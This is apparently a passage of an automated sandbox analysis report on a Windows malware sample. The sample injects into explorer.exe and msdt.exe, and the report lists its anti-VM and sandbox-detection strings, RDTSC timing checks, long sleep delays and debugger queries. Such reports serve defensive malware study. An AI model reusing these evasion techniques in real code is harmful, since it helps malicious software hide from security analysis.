          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SKM_C36821010708320.exe PID: 4740, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000030098E4 second address: 00000000030098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000003009B4E second address: 0000000003009B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe TID: 3348Thread sleep time: -53710s >= -30000s
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe TID: 2336Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5864Thread sleep count: 49 > 30
          Source: C:\Windows\explorer.exe TID: 5864Thread sleep time: -98000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.255084026.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000003.00000002.579768204.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: 1efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAL
          Source: explorer.exe, 00000003.00000002.581023913.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.255520845.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.248127457.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0040ACC0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0504A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05098D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05003D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05043540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05078DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0509740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0509740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0509740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05098CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0509070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0509070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05098F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05047794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05047794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05047794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0507FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05090EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05090EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05090EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0507FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05008EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05098ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05047016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05047016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05047016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05094015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05094015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05082073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05091074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05043884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05043884 mov eax, dword ptr fs:[00000030h]
